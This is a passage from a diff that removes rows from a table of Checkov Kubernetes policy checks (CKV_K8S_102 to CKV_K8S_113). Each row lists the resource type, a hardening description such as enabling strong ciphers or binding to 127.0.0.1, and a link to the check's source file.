-| 3190 | CKV_K8S_102              | resource                         | ReplicationController                                                                            | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
-| 3191 | CKV_K8S_102              | resource                         | StatefulSet                                                                                      | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
-| 3192 | CKV_K8S_104              | resource                         | CronJob                                                                                          | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3193 | CKV_K8S_104              | resource                         | DaemonSet                                                                                        | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3194 | CKV_K8S_104              | resource                         | Deployment                                                                                       | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3195 | CKV_K8S_104              | resource                         | DeploymentConfig                                                                                 | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3196 | CKV_K8S_104              | resource                         | Job                                                                                              | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3197 | CKV_K8S_104              | resource                         | Pod                                                                                              | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3198 | CKV_K8S_104              | resource                         | PodTemplate                                                                                      | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3199 | CKV_K8S_104              | resource                         | ReplicaSet                                                                                       | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3200 | CKV_K8S_104              | resource                         | ReplicationController                                                                            | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3201 | CKV_K8S_104              | resource                         | StatefulSet                                                                                      | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                              |
-| 3202 | CKV_K8S_105              | resource                         | CronJob                                                                                          | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3203 | CKV_K8S_105              | resource                         | DaemonSet                                                                                        | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3204 | CKV_K8S_105              | resource                         | Deployment                                                                                       | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3205 | CKV_K8S_105              | resource                         | DeploymentConfig                                                                                 | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3206 | CKV_K8S_105              | resource                         | Job                                                                                              | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3207 | CKV_K8S_105              | resource                         | Pod                                                                                              | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3208 | CKV_K8S_105              | resource                         | PodTemplate                                                                                      | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3209 | CKV_K8S_105              | resource                         | ReplicaSet                                                                                       | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3210 | CKV_K8S_105              | resource                         | ReplicationController                                                                            | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3211 | CKV_K8S_105              | resource                         | StatefulSet                                                                                      | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                |
-| 3212 | CKV_K8S_106              | resource                         | CronJob                                                                                          | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3213 | CKV_K8S_106              | resource                         | DaemonSet                                                                                        | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3214 | CKV_K8S_106              | resource                         | Deployment                                                                                       | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3215 | CKV_K8S_106              | resource                         | DeploymentConfig                                                                                 | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3216 | CKV_K8S_106              | resource                         | Job                                                                                              | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3217 | CKV_K8S_106              | resource                         | Pod                                                                                              | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3218 | CKV_K8S_106              | resource                         | PodTemplate                                                                                      | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3219 | CKV_K8S_106              | resource                         | ReplicaSet                                                                                       | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3220 | CKV_K8S_106              | resource                         | ReplicationController                                                                            | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3221 | CKV_K8S_106              | resource                         | StatefulSet                                                                                      | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                |
-| 3222 | CKV_K8S_107              | resource                         | CronJob                                                                                          | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3223 | CKV_K8S_107              | resource                         | DaemonSet                                                                                        | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3224 | CKV_K8S_107              | resource                         | Deployment                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3225 | CKV_K8S_107              | resource                         | DeploymentConfig                                                                                 | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3226 | CKV_K8S_107              | resource                         | Job                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3227 | CKV_K8S_107              | resource                         | Pod                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3228 | CKV_K8S_107              | resource                         | PodTemplate                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3229 | CKV_K8S_107              | resource                         | ReplicaSet                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3230 | CKV_K8S_107              | resource                         | ReplicationController                                                                            | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3231 | CKV_K8S_107              | resource                         | StatefulSet                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                  |
-| 3232 | CKV_K8S_108              | resource                         | CronJob                                                                                          | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3233 | CKV_K8S_108              | resource                         | DaemonSet                                                                                        | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3234 | CKV_K8S_108              | resource                         | Deployment                                                                                       | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3235 | CKV_K8S_108              | resource                         | DeploymentConfig                                                                                 | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3236 | CKV_K8S_108              | resource                         | Job                                                                                              | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3237 | CKV_K8S_108              | resource                         | Pod                                                                                              | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3238 | CKV_K8S_108              | resource                         | PodTemplate                                                                                      | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3239 | CKV_K8S_108              | resource                         | ReplicaSet                                                                                       | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3240 | CKV_K8S_108              | resource                         | ReplicationController                                                                            | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3241 | CKV_K8S_108              | resource                         | StatefulSet                                                                                      | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                          |
-| 3242 | CKV_K8S_110              | resource                         | CronJob                                                                                          | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3243 | CKV_K8S_110              | resource                         | DaemonSet                                                                                        | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3244 | CKV_K8S_110              | resource                         | Deployment                                                                                       | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3245 | CKV_K8S_110              | resource                         | DeploymentConfig                                                                                 | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3246 | CKV_K8S_110              | resource                         | Job                                                                                              | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3247 | CKV_K8S_110              | resource                         | Pod                                                                                              | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3248 | CKV_K8S_110              | resource                         | PodTemplate                                                                                      | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3249 | CKV_K8S_110              | resource                         | ReplicaSet                                                                                       | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3250 | CKV_K8S_110              | resource                         | ReplicationController                                                                            | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3251 | CKV_K8S_110              | resource                         | StatefulSet                                                                                      | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                    |
-| 3252 | CKV_K8S_111              | resource                         | CronJob                                                                                          | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3253 | CKV_K8S_111              | resource                         | DaemonSet                                                                                        | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3254 | CKV_K8S_111              | resource                         | Deployment                                                                                       | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3255 | CKV_K8S_111              | resource                         | DeploymentConfig                                                                                 | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3256 | CKV_K8S_111              | resource                         | Job                                                                                              | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3257 | CKV_K8S_111              | resource                         | Pod                                                                                              | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3258 | CKV_K8S_111              | resource                         | PodTemplate                                                                                      | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3259 | CKV_K8S_111              | resource                         | ReplicaSet                                                                                       | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3260 | CKV_K8S_111              | resource                         | ReplicationController                                                                            | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3261 | CKV_K8S_111              | resource                         | StatefulSet                                                                                      | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                        |
-| 3262 | CKV_K8S_112              | resource                         | CronJob                                                                                          | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3263 | CKV_K8S_112              | resource                         | DaemonSet                                                                                        | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3264 | CKV_K8S_112              | resource                         | Deployment                                                                                       | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3265 | CKV_K8S_112              | resource                         | DeploymentConfig                                                                                 | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3266 | CKV_K8S_112              | resource                         | Job                                                                                              | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3267 | CKV_K8S_112              | resource                         | Pod                                                                                              | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3268 | CKV_K8S_112              | resource                         | PodTemplate                                                                                      | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3269 | CKV_K8S_112              | resource                         | ReplicaSet                                                                                       | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3270 | CKV_K8S_112              | resource                         | ReplicationController                                                                            | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3271 | CKV_K8S_112              | resource                         | StatefulSet                                                                                      | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                          |
-| 3272 | CKV_K8S_113              | resource                         | CronJob                                                                                          | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
-| 3273 | CKV_K8S_113              | resource                         | DaemonSet                                                                                        | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
-| 3274 | CKV_K8S_113              | resource                         | Deployment                                                                                       | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
-| 3275 | CKV_K8S_113              | resource                         | DeploymentConfig                                                                                 | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
-| 3276 | CKV_K8S_113              | resource                         | Job                                                                                              | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
-| 3277 | CKV_K8S_113              | resource                         | Pod                                                                                              | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
-| 3278 | CKV_K8S_113              | resource                         | PodTemplate                                                                                      | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
-| 3279 | CKV_K8S_113              | resource                         | ReplicaSet                                                                                       | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
-| 3280 | CKV_K8S_113              | resource                         | ReplicationController                                                                            | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
